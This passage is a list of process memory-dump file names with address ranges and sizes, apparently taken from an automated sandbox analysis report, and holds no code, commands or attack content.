
                  • memory/4556-69-0x0000000000000000-mapping.dmp
                  • memory/4556-70-0x0000000070000000-0x00000000706EE000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/4600-238-0x0000000000000000-mapping.dmp
                  • memory/4612-283-0x0000000000000000-mapping.dmp
                  • memory/4612-295-0x0000000000980000-0x0000000000981000-memory.dmp
                    Filesize

                    4KB

                  • memory/4612-292-0x0000000000120000-0x0000000000121000-memory.dmp
                    Filesize

                    4KB

                  • memory/4612-300-0x0000000002340000-0x0000000002352000-memory.dmp
                    Filesize

                    72KB

                  • memory/4612-286-0x00000000719F0000-0x00000000720DE000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/4612-304-0x0000000004BD0000-0x0000000004BD5000-memory.dmp
                    Filesize

                    20KB

                  • memory/4728-168-0x0000000000417A8B-mapping.dmp
                  • memory/4728-172-0x0000000000400000-0x0000000000439000-memory.dmp
                    Filesize

                    228KB

                  • memory/4744-276-0x0000000000DF0000-0x0000000000DF1000-memory.dmp
                    Filesize

                    4KB

                  • memory/4744-272-0x0000000000000000-mapping.dmp
                  • memory/4744-347-0x00000000058A0000-0x00000000058C3000-memory.dmp
                    Filesize

                    140KB

                  • memory/4744-275-0x00000000719F0000-0x00000000720DE000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/4744-349-0x00000000059F0000-0x0000000005A14000-memory.dmp
                    Filesize

                    144KB

                  • memory/4744-282-0x0000000005650000-0x0000000005651000-memory.dmp
                    Filesize

                    4KB

                  • memory/4828-164-0x0000000000400000-0x0000000000498000-memory.dmp
                    Filesize

                    608KB

                  • memory/4828-162-0x000000000043FCC3-mapping.dmp
                  • memory/4844-265-0x0000000005370000-0x0000000005394000-memory.dmp
                    Filesize

                    144KB

                  • memory/4844-246-0x0000000000000000-mapping.dmp
                  • memory/4844-251-0x0000000001380000-0x0000000001381000-memory.dmp
                    Filesize

                    4KB

                  • memory/4844-249-0x0000000000B30000-0x0000000000B31000-memory.dmp
                    Filesize

                    4KB

                  • memory/4844-248-0x0000000071DF0000-0x00000000724DE000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/4920-330-0x0000000000000000-mapping.dmp
                  • memory/5020-215-0x0000000000400000-0x0000000000493000-memory.dmp
                    Filesize

                    588KB

                  • memory/5020-213-0x000000000043FCC3-mapping.dmp
                  • memory/5020-212-0x0000000000400000-0x0000000000493000-memory.dmp
                    Filesize

                    588KB

                  • memory/5024-117-0x00000000002C0000-0x00000000002C1000-memory.dmp
                    Filesize

                    4KB

                  • memory/5024-209-0x0000000005ED0000-0x0000000005EDD000-memory.dmp
                    Filesize

                    52KB

                  • memory/5024-207-0x0000000005790000-0x0000000005791000-memory.dmp
                    Filesize

                    4KB

                  • memory/5024-206-0x00000000050B0000-0x0000000005160000-memory.dmp
                    Filesize

                    704KB

                  • memory/5024-108-0x0000000000000000-mapping.dmp
                  • memory/5024-111-0x0000000070000000-0x00000000706EE000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/5064-113-0x0000000000000000-mapping.dmp